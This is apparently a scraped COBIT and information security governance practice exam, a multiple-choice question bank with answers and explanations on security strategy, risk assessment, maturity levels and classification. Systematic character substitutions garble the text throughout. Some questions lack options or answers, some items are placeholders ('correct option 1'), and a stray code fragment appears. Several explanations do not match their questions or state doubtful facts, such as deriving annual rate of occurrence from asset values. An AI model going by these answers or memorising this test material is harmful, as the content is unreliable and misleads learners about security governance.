simlado cobit 5

8/16/2019 simlado cobit 5

1/33

1 1Which one of the following is a good example of an informationsecurity strategy?

A. Changing passwords regularly.B. Balancing administrative versus technological controls.C. Prohibiting the use of dial up modems on laptops lin!ed to thecorporate networ!.". "oing bac!ground chec!s on all applicants for security positions.

B is an example of strategy. #one of the other choices are of a strategic nature$

although they are examples of good practice %&

& & An enterprise that publishes information on the 'nternet must have$ asa minimum$ which one of the following items in place?

A. "ata policy.B. (ecurity policy.C. Privacy policy.". Communications policy.

'nformation published on the 'nternet should be protected by a privacy policylin!ed to each page. )ach page should provide a notice lin!ing to that privacypolicy and allowing *opt in* and+or *opt out* options, documents published on theWeb need expiration dates and a process to remove these documents, consentmust be obtained from authors of any published material$ and if copying or reuseis prevented$ then that should be made clear %-

- -Which one of the following would be a strategic ob ective forinformation security?

A. 'mproved incident response capability.B. )nterprise baseline security established.C. )xecutive involvement in the security awareness programme.". 'ncreased organi/ational capability.

0ranslating benefits achieved into an increased organi/ational capability thatenables future business is a strategic ob ective. 0he other options are alloperational activities %

'f server downtime is a performance measure appropriate to '0management which one of the following is a li!ely performancemeasure that senior+executive business management would typicallyfocus on?

A. 'mpact on revenue.B. Cost of eBusiness application.C. Ping response.". Cost per eBusiness transaction.

(enior+executive management are only interested in measurements that showthe impact on mission critical areas %1

2 20he business need for asset protection is best expressed in terms ofwhich one of the following attributes?

A. '0 3uality.B. '0 reliability.C. '0 integrity.". '0 compliance.

A. 3uality 4 performance standard$ B. reliability 4 fiduciary control$ C. integrity 4asset protection$ ". compliance 4 f iduciary control. 0herefore$ information security is focused on asset protection %-

5 5Which one of the following documents should be submitted whensee!ing senior management commitment for the information securityprogram?

A. %is! assessment report.B. "etailed list of tas!s.C. (ecurity technology brochures.". Budget of !nown costs of security.

" is correct because cost is always an important issue for decision ma!ers.(enior management are typically not interested in the detailed tas!s$ theinventory of ris!s or how the technology wor!s. 0hese activities are usuallydelegated. But matters of cost are rarely delegated %

6 6Which one of the following would be one of the best strategies inma!ing a security policy effective?

A. 'nclude users in the process of developing a security policy.B. Calculate the cost of too little security and any inconvenience.C. "etail the punishments for failing to comply.". 7a!e the buy in from a senior manager highly visible.

8isible actions of senior management supporting the security policy willdemonstrate their clear commitment and will have the most impact in achievingthe desired effectiveness. 0he other options$ whilst useful$ will not be as effective%

9 9(ecurity management would typically report the achievements ofinformation security initiatives in supporting the business strategy byusing which one of the following measurements?

A. 0ime lag between detection$ reporting and acting upon securityincidents.B. %educed number of security related service calls$ change re3uestsand fixes.C. Customer satisfaction.". #umber of incidents causing public embarrassment.

Cobi0 7anagement :uideline (enior+executive management are onlyinterested in measurements that show the impact on mission critical areas.Customer satisfaction is the most important issue listed %-

; ; Awareness about information security activities is enhanced when setout clearly in which one of the following documents?

A. .B. (ecurity standards.C. ob descriptions.". 0raining manual.

C is correct because ob descriptions that set out roles and responsibilitiesindicate the significance of security to the employee. (omething for which thatthey are specifically accountable. (etting out security matters in roles andresponsibilities of staff has little to do with standards$ B is therefore inappropriate.

A 7ay be a byproduct$ but would not be the ob ective. " is a possibility$ but notas effective as ob descriptions %-


2/33

1@ 1@Which one of the following is essential in securing senior managementcommitment and support of information security management?

A. Basing information security discussions around a plan of action.B. sing a technical specialist to explain security properly.C. Presenting evidence of the threats of a security breach.". )xplaining in clear details what needs to be done$ rather than why.

A is correct as senior management expect answers to any problems presented$or at least a plan to address the problem. 0hey do not normally want to spea! to

specialists$ nor do they appreciate hype. " is not correct as senior managementare more interested in W something must be done$ rather than with W A0needs to be done %1

11 110he most successful action for integrating information securitygovernance into the overall enterprise governance framewor! is li!elyto be which one of the following?

A. (end information security personnel on corporate governancetraining.B. )stablishing an audit committee that clearly understands its role.C. Appointing a business manager as head of information security.". Combining the internal audit function with security management.

A is a possible correct answer$ but in comparison to B$ is inferior. " isinappropriate and whilst C is not inappropriate it will not address the issues ofbetter governance. B$ establishing an audit committee that understands its role$is the best answer %&

1& 1&ow can the balanced scorecard techni3ue be used for ris!

management?

A. 7apping '0 ris!s to !ey goal indicators.B. %elating performance indicators to outcomes.C. (tating process outcomes as ris! drivers.

". %estating !ey goal indicators as ris! indicators.

0he balanced scorecard$ as a techni3ue$ focuses on ob ectives and relatedmeasures. 'f !ey goal indicators have been defined to meet business ob ectives$then they can be restated in terms of the associated ris!s should the businessob ectives not be met %

1- 1-Which one of the following is a popular method of integratinginformation security governance into the overall enterprise governanceframewor!?

A. (ecurity awareness campaigns.B. Benchmar!ing.

C. Centrali/ed security administration.". )nterprise ris! management.

)ffective security is not ust a technology problem$ it is a business issue.)nterprise ris! management will address many issues including the corporateculture$ management*s security consciousness and security related actions.)nterprise ris! management will ensure information security$ where significant$will be part of the overall governance framewor! %

1 1Which one of the following information criteria would be important toaddress enterprise executives and directors fiduciary responsibilitiesfor security management?

A. %eliability.B. )ffectiveness.C. Availability.". 'ntegrity.

A. reliability 4 fiduciary control, B. effectiveness 4 performance, C. availability 4security, ". integrity 4 security, %eliability relates providing management withappropriate information for it to use in operating the entity$ providing financialreporting information$ providing information to report to regulatory bodies withregard to compliance with laws and regulations %1

12 12igh level security policies are created for which one of the following

reasons? A. Administrative.B.


3/33

considered so that the system can function as intended. 0he pro ect budget is nottheir concern. 0he design documentation will be reviewed by a security technicalexpert. Cost ustification of the system design would not be the responsibility ofthe security steering committee %&

1; 1;Which one of the following roles would be acceptable for the (ecurity

Administrator to perform$ in addition to their normal function?

A. "ata Base Administrator.B. (ystems Analyst.C. Computer


4/33

A is correct. 0here would be less of an enterprise view of security arrangements.But this should not result in a lower level of awareness$ lac! of significance ordirection as in a devolved situation employees should be supported throughtraining and therefore able to fine tune security to match precise needs %1

&6 &6Which one of the following is a disadvantage of a devolved '0 securityarrangement with all employees being responsible for security as anintegral part of their activities?

A. (ecurity becomes subservient to other activities.B. igher managerial effort.C. Fower personal motivation.". )xcessive bureaucracy.

0he disadvantage of devolution is an increase in managerial effort to maintaincontrol. (ecurity will be an integral part$ and therefore not a subservient activity.(taff will be more motivated not less$ and the excessive bureaucracy will beremoved %&

&9 &9When securing personally identifiable information which one of thefollowing is a reasonable basis to determine the level of protectionre3uired?

A. (ensitivity of the information.B. (ource of the information.C. Cost to obtain the information.". 8alidity of the information.

A is the correct answer because the sensitive nature of the information ta!esprecedence over source$ cost or reliability %1

&; &;Where an organi/ation is collecting personally identifiable information$it should be able to explain which one of the following to the individual?

A. 0he nature of its business in relation to its customers.B. 0he purpose for which the information is being collected.C. 0he enterprise business plan.". 0he business continuity planning arrangements.

Personally identifiable data should only be collectible from individuals where itcan explain the purpose for doing so. 0he other options are not relevant %&

-@ -@Privacy cannot be protected without ade3uate networ! securityprograms$ good encryption$ identification programs and which one ofthe following?

A. ser manuals.B. "ocument management programs.C. Arbitration schemes.". %etention of staff.

0he management of business records is a critical component ensuring privacy%&

-1 -10he information security manager would consider insurance as a toolfor which of the following ob ectives?

A. Protection of property.B. Preservation of critical information.C. "efect management.". %evenue growth.

'nsurance has little to do with revenue or defect management. Whilst protectionof property is secured through insurance$ this is very much part of the normalinsurance arrangements of a company. Preservation of critical information wouldbe a core area of responsibility for the information security and therefore a tool tobe used to counter threats %&

-& -&Which one of the following activities is li!ely to result in reducedinsurance premiums?

A. Duality assurance.B. %ecruitment practices.C. )nterprise architecture.". Classification of information.

(ome insurance providers provide lower insurance premiums if the organisationmeets various criteria that include the classification of information$ networ!security and business continuity planning. 0he other options have no relevanceto insurance contracts %

-- --Which one of the following can be used to identify enterprise record!eeping re3uirements?

A. "atabase management system.B. %is! assessment.C. (ecurity policy.". (ystem specifications.

)xplanation %&

- -

With whom should responsibility and accountability for recordmanagement rest?

A. )xecutive management.B. A person with authority.C. Process owners.". "ata administration.

(pecific leadership responsibility and accountability for records managementshould be assigned to a person with appropriate authority within the organi/ation.)xecutives are responsible for supporting the application of records managementpolicies throughout the organi/ation %&

-2 -2Which one of the following is most li!ely to influence decisions aboutthe development and implementation of particular business documentclassification tool or techni3ue?

A. 0he complexity of the business activities.B. 0he way business activities are performed.C. 0he external threats to the enterprise.". 0he level of support given to users.

0he level of support given to users will influence decisions about thedevelopment and implementation of particular classification tools. 0he complexityof the business activities$ and the way business activities are performed$ willinfluence the type of classification tool most suited to an organisation. C is not


5/33

relevant %

-5 -5What is the primary driver for record retention?

A. Compliance with legislation.B. A durable historical record.C. 'nformation security.". "ata protection.

:ood records are vital corporate assets and good record !eeping is essential fora reliable and durable long term historical record. )ach of the other options havean impact$ but the primary driver is maintaining a historical record of businessactivity %&

-6 -6Which one of the following should not be included in an informationsecurity policy?

A. (enior management expectations.B. Prescriptive information.C. (tatements of direction.". Clarity on accountability.

0he security policy should set out senior management re3uirements$ withoutdetailing how they should be achieved. Business management should be allowedthe choice of mechanism %

-9 -9Which one of the following is an effective way of tying security policy tobusiness ob ectives?

A. 'nformation classification.B. (ystems master plan.C. 'nformation engineering.". )nterprise architecture.

'nformation classification will enable security policies to be applied according tobusiness priorities. 0he systems master plan is used to map application systemdevelopment to business re3uirements. 'nformation engineering is used to modelinformation re3uirements across the enterprise to the information systemsarchitecture. An enterprise architecture is a repository of information about theorganisation$ it*s information$ business processes$ application systems andsupporting infrastructure useful for decision ma!ing %1

-; -; A security architecture presupposes the existence of which one of thefollowing?

A.


6/33

A process model such as Cobi0 has been developed based onexperience that has shown the maturity level of an organi/ation to bean indicator of which one of the following?

A. Past performance.B. Current performance.C. Guture performance.". 7inimum performance.

0he maturity level of an organi/ation provides a way to predict the future

performance of an organi/ation within a given discipline or set of disciplines.)mpirical studies of the (oftware )ngineering 'nstitute prove this. 0he otherchoices are not feasible %-

2 2When focused on process improvement organi/ations do their best inwhich one of the following instances?

A. Align their efforts with their current process area capabilities.B. Gocus on maximi/ing process area sophistication rapidly.C. Gocus their efforts on a manageable number of process areas.". Plan the increased sophistication around current demands.

)xperience has shown that organi/ations do their bestH when they focus theirprocess improvement efforts, on a manageable number of process areas, thatre3uire increasingly sophisticated effort, as the organi/ation improves %-

5 5'f the assessment of ris! is a standard procedure and exceptions tofollowing the procedure would be noticed by '0 management$ theprocess capability is li!ely to be assessed according to the Cobi0model at which one of the following levels?

A. "efined Process.B. 'nitial+Ad hoc.C. 7anaged and 7easurable.". %epeatable but intuitive.

At Fevel =7anaged and 7easurable> control is established using statistical andother 3uantitative techni3ues and therefore exceptions will be easily detected %-

6 6Which of the Cobi0 processes listed below are most directly related tothe management of information security?

A. 7anage 3uality.B. "efine the organi/ational relationships.C. Assess ris!s.". Assess internal control ade3uacy.

'nformation security is a response to managing ris!s and therefore C is thecorrect answer. A and B are clearly incorrect$ whilst " is indirectly relevant tosecurity %-

9 9What is the basic premise of Cobi0 when it comes to achievingenterprise needs?

A. Process capability is re3uired in - processes.B. Eey performance indicators must balance !ey goal indicators.C. Eey goal indicators must balance four !ey perspectives of theenterprise.". '0 needs to deliver the information that the enterprise needs.

At the core of Cobi0 is the understanding that '0 delivers value to the businessthrough the information it produces. 'nformation that is late or unreliable has littlevalue %

; ;'f an organi/ation considers '0 ris!s in an ad hoc manner$ withoutfollowing defined processes or policies it will be assessed at whichlevel of process maturity?

A. 7aturity level 1.B. 7aturity level &.C. 7aturity level -.". 7aturity level .

At 7aturity level 1 it is an environment where activities are conducted in an adhoc$ chaotic manner. 7aturity level 1 organi/ations often produce products andservices that wor!$ but only because of the efforts of the individuals employed %1

2@ 2@'f responsibilities for continuous service are informal$ with limitedauthority and management is only now becoming aware of the ris!srelated to$ and the need for$ continuous service$ then the process

capability will be assessed at which one of the following levels?


According to the '0 (ecurity :overnance 7aturity 7odel$ at level &responsibilities and accountabilities for '0 security are assigned to an '0 securitycoordinator with no management authority. At level 1 responsibilities forcontinuous service are informal$ with limited authority. 7anagement is becomingaware of the ris!s related to and the need for continuous service %&

21 21

At which maturity level would processes be well characteri/ed andunderstood$ and are described in standards$ procedures$ tools$ andmethods?

A. 7aturity Fevel 1.B. 7aturity Fevel &.C. 7aturity Fevel -.". 7aturity Fevel .

At maturity level -$ processes are well characteri/ed and understood$ and aredescribed in standards$ procedures$ tools$ and methods. (tandards are the firstlevel above having properly defined procedures$ which is maturity level & %-

2& 2& At which process maturity level would the process disciplines helpensure that existing practices are retained during times of stress?


0he process discipline reflected by maturity level & helps to ensure that existingpractices are retained during times of stress. When these practices are in place$pro ects are performed and managed according to their documented plans %&


7/33

2- 2- At which level of maturity would an organi/ation have a set of standardprocesses for security awareness briefings that have been establishedand improved over time so that these standard processes can be usedto establish consistency across the organi/ation?


0he organi/ation*s set of standard processes$ which is the basis for maturity level-$ is established and improved over time. 0hese standard processes are used toestablish consistency across the organi/ation. Pro ects establish their definedprocesses by tailoring the organi/ation*s set of standard processes according totailoring guidelines %-

2 2Which one of the following statements about the information securityarchitecture is least li!ely to be correct?

A. 't contains the detailed specifications$ procedures$ guidelines$standards and ob descriptions for security management.B. 't describes the form$ appearance$ function and location ofinformation security processes.C. 't provides a common basis for the design$ development$implementation and management of the information security process.". 't provides the basis on which the enterprise technology architecturewill be selected and implemented.

0he information security architecture is a high level document that describes theform of security processes$ provides a common basis for design$ and is used toselect technology %1

22 22 At which level of process capability would high availability componentsand system redundancy be applied$ albeit piecemeal?


According to the '0 (ecurity :overnance 7aturity 7odel$ at level & reporting onsystem availability is incomplete and does not ta!e business impact into account.

At level - high availability components and system redundancy are being appliedpiecemeal %1

25 25 At which level of '0 (ecurity :overnance maturity model are useridentification$ authentication and authori/ation standardi/ed across theenterprise?


According to the '0 (ecurity :overnance 7aturity 7odel$ at level useridentification$ authentication and authori/ation are standardi/ed enterprise wide%-

26 26'(< 166;; is intended to serve as a single reference point foridentifying the range of controls needed by business. What si/e

enterprise is '(< 166;; specifically targeted?

A. (mall.B. 7edium.C. Farge.". All.

'(< 166;; =based on part one of B( 66;;> is intended to serve as a singlereference point for identifying the range of controls needed for most situationswhere information systems are used in industry and commerce. 't is suitable foruse by any si/e organi/ation %

29 290he *balanced scorecard* techni3ue can be used by (ecuritymanagement for which one of the following purposes?

A. (trategic alignment.B. %is! assessment.C. 'nternal control design.". Process capability improvement.

0he balanced scorecard techni3ue is used to align activities with the strategicob ectives. Within security management the balanced scored is used for strategicalignment with business goals %1

2; 2; A business that is planning to use the Web to improve and+or integratecore business processes internally would typically re3uire which one of the following sets of security measures?

A. Basic firewall$ anti virus and e mail password protection$ privacypolicy$ Web notification of privacy policy.B. "emilitari/ed /one, identification$ authentication and authori/ation atthe Web and application levels, intrusion detection, transactionencryption, basic administration$ privacy notice containing proceduresfor data handling.C. Well defined policies, centrali/ed identification$ authentication$authori/ation and management for all systems$ data and applications,

data encryption, privacy *contracts*.". 'ntegration of administration, identification$ authori/ation andauthentication schemes for data and applications, cross enterprisetrust, privacy *contracts*.

(ecurity re3uirements need to includeH centrali/ed authentication andauthori/ation for all systems and applications. Currently$ available securitymanagement products allow centrali/ed$ controlled access to applications basedon security and privacy policies that define user and group ob functions =orroles>. (ystems that centrally monitor security events across the enterprise sothat suspicious activities can be more readily identified and appropriate actionta!en. (tandardi/ation of security system products$ interfaces and protocols isimportant for application integration %-

5@ 5@'(< 166;; is best described by which one of the following statements?

A. A collection of baseline information security procedures.B. As a starting point for developing organisation specific guidance.C. A comprehensive set of security measures and controls to follow.". A standard that is only applicable to large enterprises.

'(< 166;; is a starting point for developing organisation specific guidance. #otall the guidance and controls in the code of practice may be applicable and othercontrols$ not included$ may be necessary. 't is applicable to enterprises both largeand small. 't is not a baseline$ nor is it comprehensive %&


8/33

1 1Which enterprise business processes should the information securitymanager understand?

A. All processes.B. 'nternal process.C. )xternal processes.". Critical processes.

0he information security manager should understand those business processesand information resources that are critical to each business process. 0his willensure that implemented security matches the business re3uirement% $ &>,

& &'n assessing ris!s$ it is most important for the information securitymanager to commence with an analysis of which one of the following?

A. Pro ect ob ectives.B. Control ob ectives.C. Business ob ectives.". Duality ob ectives.

0here is a direct relationship between business ob ectives$ which are what an

entity strives to achieve$ and the enterprise ris! management components.)ffective enterprise ris! management helps management achieve businessob ectives. But enterprise ris! management$ no matter how well designed andoperated$ does not ensure an entity*s success %-

- - A continuous approach to ris! management will be focused on whichone of the followings?

A. )vents and impacts.B. 7etrics and monitoring.C. %esponse and controls.".


9/33

rise to a threat %1

11 110he most appropriate criteria for an information classification exerciseis which one of the following?

A.


10/33

C. 'f threats are un!nown$ they can be 3uantified.". 'f the ris!s are inherent$ they can be mitigated.

A is correct$ because normally one responds to a situation of wea! controls byimproving on the strength. 't is not always easy to change the impact directly$ noris it easy to 3uantify threats. 'nherent ris!s cannot be mitigated$ but are part ofdoing business %1

&1 &1ow would a security manager best determine if the baselines for

security are acceptable at their individual organi/ation?

A. Perform a ris! assessment.B. "iscuss with the vendors.C. )xamine industry best practice.". %eview past audit reports.

A ris! assessment will enable the security manager to determine whether or notsecurity processes and procedures above the baseline are necessary %1

&& &&Which one of the following is an example of a detection control?

A. 7essage authentication.B. Power supply protection.C. 0erminal time out.". Chec!sum.

" is the only detection control. 7essage authentication is a preventative control$terminal time out is a security control and power supply protection is a physicalprotection mechanism to ensure availability %

&- &-Which one of the following activities would occur first in a process tomitigate inherent ris!s to acceptable levels across the enterprise?

A. 'mpact assessment.

B. "evelop a ris! response.C. nderstand business ob ectives.". )vent identification.

Whilst all are part of the enterprise ris! management process$ the order isob ectives$ events$ impact$ response. C is therefore correct %-

& &Proponents of 3ualitative ris! analysis would argue which of thefollowing points to be true?

A. %is! analysis is essential for determining countermeasures.B. %is! analysis implies a precision that does not exist.

C. %is! analysis is the process to gather detailed metrics aboutsecurity concerns.". %is! analysis implies a high level of precision is re3uired.

Duantitative ris! analysis is considered too sub ective to be meaningful and that itis not possible to ma!e calculations with any real precision much is*guestimates*. I$ &

&2 &20he ris! assessment methodology needed to determine whethercertain vulnerabilities are present$ will be affected by which one of thefollowing?

A. 0he expected si/e of the vulnerability in relation to the entity.B. 0he si/e of the entity and number of people employed.C. 0he nature of the '0 system and the phase of the ("FC it is in.". 0he number of wea!nesses that can be exploited.

0he existence of vulnerabilities will be most affected by the nature of the '0systems and or the phase of ("FC. 0he other options will not have an impact onthe methodology used. I$ -

&5 &5When performing a ris! analysis$ the annual rate of occurrence iscalculated from which one of the following?

A. %is!s.B. 8ulnerabilities.C. 0hreats.". 8alues.

0he value of assets that can be lost =impact> is the basis for calculating theannual rate of occurrence %

&6 &6 A security concept of operations =strategy> is developed in which one

of the following ("FC phases?

A. 'nitiation.B. "evelopment or Ac3uisition.C. 'mplementation.".


11/33

". Gewer tas!s being needed for recovery.

A short recovery time ob ective re3uires speciali/ed approaches for recovery andat a higher cost %1

-1 -1Which one of the following is used to establish the vulnerability of anenterprise?

A. 0he value of the asset.B. 0he absence of a safeguard.C. 0he si/e of the ris!.". 0he number of threats.

8ulnerability is related to a ris! that can be countered. 0he absence of asafeguard causes the vulnerability %&

-& -&Which one of the following is a typical method used to determinewhether system vulnerabilities are present?

A. (taff surveys.B. )xternal vulnerability sources.

C. 8endor documentation.". 'nternal audits.

)xternal sources that maintain databases of information are typical places toobtain information about vulnerabilities %&

-- --Which one of the following is re3uired before the potential lossesincurred during the reali/ation of a threat can be estimated?

A. Common asset valuation process.B. Countermeasure design process.C. (tandardi/ed vulnerability labels.". 0hreat ran!ing methodology.

Potential losses can only be determined if you have an idea of the asset values%1

- -Duantitative ris! analysis is less li!ely to include which one of thefollowing characteristics?

A. Cost+benefit analysis.B. Ginancial hard costs.C. Automated method.". :uesswor!.

Duantitative analysis is intended to reduce the guesswor! often found in ris!analysis %

-2 -2Which one of the following would be the primary purpose of performinga gap analysis to assess generally accepted standards of goodpractice for information security management against current state.

A. Benchmar! against similar enterprise in the same and otherindustries.B. "evelop a set of action plans to recommend to management.C. )stablish a baseline for measuring progress in the future.". 'nstitute a programme of continuous process improvement.

B and " are not correct as a gap analysis would provide insufficient information.Whilst benchmar!ing would be of interest$ the primary purpose of the gapanalysis is simply to establish a point of reference for assessment again in thefuture %-

-5 4 new Array=ICJ-50he current status of process capability is determined from which oneof the following?

A. 7aturity scale.B. :ap analysis.C. Benefits analysis.". %is! assessment.

An information security governance maturity model is scale for scoring thecurrent status of a process. :ap analysis is used to determine where you want tobe$ benefits analysis is used to prioriti/e the initiatives. A ris! analysis is a basepractice and not an indicator of process capability %1

-6 -6Which one of the following would be used to determine processcapability targets?


An information security governance maturity model is scale for scoring thecurrent status of a process. :ap analysis is used to determine where you want tobe$ benefits analysis is used to prioriti/e the initiatives. A ris! analysis is a basepractice and not an indicator of process capability %&

-9 -9Which one of the following would be used to priorities securityinitiatives?


An information security governance maturity model is scale for scoring thecurrent status of a process. :ap analysis is used to determine where you want tobe$ benefits analysis is used to prioriti/e the initiatives. A ris! analysis is a basepractice and not an indicator of process capability %-

-; -;Which of the following is the biggest advantage of the ris! assessmentapproach over the baseline approach to information security

management?

A. At least some protection is available for all resources.B. 't ensures that the resources are not over protected.C. 't is an easier approach to implement.". 0he level of protection is matched to !nown threats.

0he baseline approach ensures a particular level of control across theenvironment. sing a ris! assessment enables apriority to be established and themost li!ely targets are protected first and to a degree appropriate to the threat %&

@ @Which choice below most accurately reflects the goals of ri s!


12/33

mitigation?

A. "efining the acceptable level of ris! the organi/ation can tolerate$and reducing ris! to that level.B. Analy/ing and removing all vulnerabilities and threats to securitywithin the organi/ation.C. "etermining all the threats to the business and transferring them toother organi/ations.". Analy/ing the effects of a business disruption and preparing thecompany*s response.

%is! mitigation is about reducing the inherent ris! of being in business toacceptable levels that match the revenue generated %1

1 1Which of the following is an error correction control relating to theraising of source documents?

A. A ban! teller recording separately the total number of chec!sdeposited.B. Pre formatted deposit slips to be used by a ban! customer.C. "ual custody of details about the deposit.". %ecording the depositors personal details.

0he depositor*s personal details are relevant for error correction %

& &Which one of the following is the appropriate document to describe ris!mitigation strategies?

A. %is! analysis.B. 'nformation security policy.C. 'nformation security architecture.". 'nformation classification scheme.

0he information security architecture describes the enterprise wide functionalityof security solutions to be deployed i.e. the ris! mitigation strategic choices. I$ -

- -0he ris! remaining after the implementation of new or enhancedcontrols is often described as which one of the following?

A. 7itigated ris!.B. %esidual ris!.C. 0ransferred ris!.". Control ris!.

'nherent ris! is as a result of the business activities. 0hrough appropriatecountermeasures inherent ris!s are reduced$ the result being the residual ris! %&

A good ris! mitigation strategy to start with against potential humanthreats when a vulnerability or flaw exists is which one of the following?

A. "ecrease the li!elihood of the vulnerability being exercised.B. 7inimi/e the ris! of occurrence.C. "ecrease attac!ers motivation.". %educe potential for loss.

When vulnerability =or flaw$ wea!ness> existsH implement assurance techni3uesto reduce the li!elihood of a vulnerability being exercised. When a vulnerabilitycan be exercisedH apply layered protections$ architectural designs$ andadministrative controls to minimi/e the ris! of or prevent this occurrence. Whenthe attac!er*s cost is less than the potential gainH apply protections to decreasean attac!ers motivation by increasing the attac!er*s cost =e.g.$ use of system

controls such as limiting what a system user can access and do can significantlyreduce an attac!er*s gain>. When loss is too greatH apply design principles$architectural designs$ and technical and non technical protections to limit theextent of the attac!$ thereby reducing the potential for loss %1

2 2When selecting a ris! mitigation solution the security manager will ta!ewhich of the following into account?

A. A balance between costs of the security solution and ris!s of theresources.B. A mix between security solutions to maximise effectiveness againstthe ris!s.C. A combination of vendor opinion and security managementpreferences.". Preferred solutions identified in any of the past internal or externalaudit reports.

0he security manager must balance the cost of the security techni3ue againstris!s to the information resources %1

5 5Which one of the following should receive greatest weighting when

selecting a security solution?

A. (ensitivity analysis.B. Cost+benefit analysis.C. %is!s to information resources.". )xecutive management directive.

)xecutive management determine the ris! profile for the enterprise based ontheir perception of balancing ris! and reward for the benefit of the sta!eholders%

6 6Which of the following is the biggest actual threat to informationsystems?

A. ac!ers.B. )mployees.C. 'ndustrial espionage.". 8iruses.

%ecent surveys continue to show that the real threat is from internal sources employees$ firstly as a result of errors %&

9 9Which one of the following is an acceptable techni3ue for assigningvalue to resources?

A. 0echnical complexity.B. )xecutive management directive.C. Fevel of control procedures.". A combination of the above.

'n practice$ security managers use a combination of these techni3ues %

; ;Which one of the following is the preferred approach for a securitymanager adopt in determining that the level of security is appropriate?

A. 'ndustry standard baselines.B. %is! assessment.


13/33

C. 8endor recommendations.". Benchmar!ing.

A ris! based approach will ensure that specific threats to the enterprise areaddressed$ whilst the other approaches will address the general concerns %&

2@ 2@Which one of the following is the most significant benefit from settingbaselines for security over an enterprise*s information?

A. Accuracy.B. )ffectiveness.C. (tandardi/ation.". Duality.

Baselines provide a level of standardisation around what has been mutuallyagreed between industry security professionals$ vendors and auditors %-

21 21What is considered to be the ma or benefit of an automated ris!analysis product?

A. "atabase of vulnerabilities.

B. "atabase of threats.C. 7inimal effort to rerun the analysis.". Ability to handle complex calculations.

Whilst an automated tool often comes with a database of information$ this maynot be entirely relevant. Conse3uently$ it should be used with care. What is ofbenefit is that once the database is set up$ the analysis can be re run withminimal effort %-

2& 2&Why is ris! management an important senior managementresponsibility?

A. 0hey are responsible for business operations and '0 procurementprocess.B. 0hey have responsible for ensuring that proper controls are in placeto address in tegrity.C. 0hey must operate under a standard of due care and with ultimateresponsibility for mission accomplishment.". 0hey are responsible for budgeting and performance.

)xecutive management are re3uired to manage with appropriate s!ills and withdue care not negligently %-

2- 2-What is the typical output of a ris! assessment?

A. An inventory of ris!s that may impact the enterprise.B. "ocumented threats to the enterprise.C. )valuation of the conse3uences to the entity.". A list of appropriate controls for reducing or eliminating ris!.

0he output of a ris! assessment should be a list of countermeasures to reduceris! to acceptable levels %

2 2Which one of the following is a popular techni3ue used to report thestatus of identified ris!s?

A. :antt Chart.

B. eat map.C. P)%0 diagram.". Critical Path Analysis.

eat maps depict the colours red$ amber and green to illustrate how serious theconcern is to management %&

22 22Which one of the following statements about information classificationis true?

A. (ecurity and availability have interchangeable characteristics.B. 'nformation classification is a business decision process.C. 'nformation classification is a technical process best left to securityspecialists.". 0he greater the number of information classification categories thebetter.

0he decisions about classification are based on business re3uirements fordifferent protection levels. 0he fewer the better %&

25 25't is good practice that the security classification be underta!en byH

A. Business managers.B. (ecurity officer.C. 'ndividuals responsible for the information.". '0 management.

0he decisions about classification are based on business re3uirements fordifferent protection levels. 0he fewer the better %-

26 26(cientific processes for ris! management$ based on probabilities$ ris!sand threats$ can prove impractical due to a shortfall in which one of thefollowing?

A. )xperience.B. Budget.C. 0ools.". People.

Available budget is often limited$ conse3uently only the most critical ris!s canreceive attention %&

29 29Criticality of information systems is measured on two scalesH tolerableperiod of outage and which one of the following?

A. 0olerable period to recover systems.

B. 0olerable period to relocate.C. 0olerable period to recover bac!up systems.". 0olerable period to overcome bac!log of transactions.

0he transaction bac!log after an outage is restored can often be a !iller.7anaging the bac!log to /ero may be very difficult %

2; 2;(tem

A. correct option 1.


14/33

B. option &.C. option -.". option .

)xplanation %1

5@ 5@(tem

A. correct option 1.B. option &.C. option -.". option .

)xplanation %1

1 1'n planning for physical security$ a series of barriers at different pointsmay be considered. )ach level of physical protection should haveH

A. "ifferent points of entry to distribute the ris! of penetration.

B. A published statement of activity within each perimeter.C. Colour coded documentation for each protection level.". A defined security perimeter with consistent protection.

" is correct since consistent protection on the perimeter is essential securitybreaches will occur at the wea!est points$ and therefore security is as good asthe wea!est lin!. A$ B and C all have the opposite condition as being true %

& &0 security practitioners =e.g.$ networ!$ system$ application$ anddatabase administrators, computer specialists, security analysts,security consultants> are responsible for which one of the followingsecurity related activities?

A. 7ission accomplishment.B. %is! management.C. Planning$ budgeting$ and performance measurement.". Proper implementation of security re3uirements in their '0 systems.

(ecurity practitioners are expected to focus on the proper implementation ofsecurity re3uirements in their '0 systems. (ecurity management and businessmanagement will focus on the activities %

- - A discretionary access control mechanism is based on which one ofthe following?

A. 'nformation value.B. Gile permission sets.C. (ensitivity labels.". (ystem classification.

"iscretionary access control often is in the form of access control lists associatedwith files i.e. file permission sets %&

An information security manager who is about to plan an upgrade ofnetwor! security would re3uire which one of the following first?

A. (ite diagnostic and survey.

B. (ervice level agreement.C. igh level diagnostic and review.". 'mplementation plan.

0he high level diagnostic is used to plan the more detailed site diagnostic andsurveys which would be followed by an implementation plan to improve securityand a service level agreement to maintain security %-

2 20he best ustification for the implementation of baseline securitycontrols is which one of the following?

A. (pecified by vendors.B. "esigned by expertsC. (uccessful common practice.". Comprehensive by nature.

C is correct as baseline controls are based on good practice. 't is not source fromvendors nor experts. Baseline controls are not intended to be comprehensive %-

5 5Baseline security controls can be used best for which one of thefollowing activities?

A. (ecuring unstable environments.B. (trengthening security standards.C. "etailing security implementation tas!s.". )stablishing a corporate security policy.

B. is correct as the baseline sets the common level of standards that is t ypicallyattained. 't is a way to 3uic!ly get going with security implementation. nstableenvironments would need careful assessment an specific controls identified."etailing security implementation tas!s or first defining policy are more thorough$but time consuming approaches %&

6 6Which one of the following is the best metric to manage the information

security program=me>?

A. #umber of systems sub ect to intrusion detection.B. #umber of recorded deviations from minimum information securityre3uirements.C. Amount of downtime caused by security incidents.". 0ime lag between detection$ reporting and acting upon securityincidents.

0he number of systems sub ect to intrusion has no relevance to the 3uality ofsecurity management but more to do with the enterprise*s vulnerability. 0heamount of downtime is a measure of the scale of the threat. 0he time lag is ameasure of the responsiveness of the security team. But the number ofdeviations from set re3uirements is a direct correlation to the 3uality of thesecurity programme %&

9 9Baseline security measures are used to address which one of thefollowingH

A. (pecific business needs.B. Common control re3uirements.C. Particular ris! profiles.". A minimum level of loss.

B is the correct answer because baseline controls result from a set of commoncontrol re3uirements developed through the collaborative efforts of companieswith similar interests. Baseline does not address specific needs$ nor does it


15/33

address particular ris! profiles. #or does baseline relate to a minimum level ofloss. 't is addressing a common re3uirement %&

; ;Which one of the following is an example of a preventative technicalcontrol?

A. #on repudiation.B. 'nternal audit.C. %estore secure state.". 'ntrusion detection.

#on repudiation is a preventative control associated with authentication %1

